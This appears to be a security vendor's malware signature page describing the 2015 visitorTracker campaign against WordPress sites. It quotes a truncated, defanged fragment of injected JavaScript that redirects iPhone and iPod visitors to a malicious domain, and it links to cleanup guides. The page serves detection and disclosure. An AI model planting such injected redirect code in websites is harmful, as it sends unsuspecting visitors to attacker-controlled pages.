SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.visitor_tracker


Detected a malicious JavaScript code specific to the visitorTracker malware campaign that infected a significant number of [mostly] WordPress sites in fall of 2015. The malicious scripts were injected into .js files.

The attack had multiple waves. In each wave the injected code changed.

In the first waves, the code was easily recognizable:

/*​visitorTracker*/var visitortrackerin = setInterval(function(){
        if(document.body != null && typeof document.body != "undefined"){
                if(typeof window["globalvisitor"] == "undefined"){
                        window["globalvisitor"] = 1;
                        var isIE = visitortrackerde();
                        var isChrome = !​isIE && !! && window.navigator.vendor === "Google Inc.";
              if ((navigator.userAgent.match(/​iPhone/i)) || (navigator.userAgent.match(/iPod/​i))){
                                        window.​location = "hxxp://vovinutrysiki[.]gq/052F";
                                        document.​location = "hxxp://vovinutrysiki[.]gq/052F";

while the code in the later waves was much more obfuscated...


Affecting: WordPress sites and other sites that share hosting accounts with WordPress sites.

More Information: WordPress Malware – Active VisitorTracker Campaign
WordPress Malware – VisitorTracker Campaign Update
How to clean a hacked WordPress site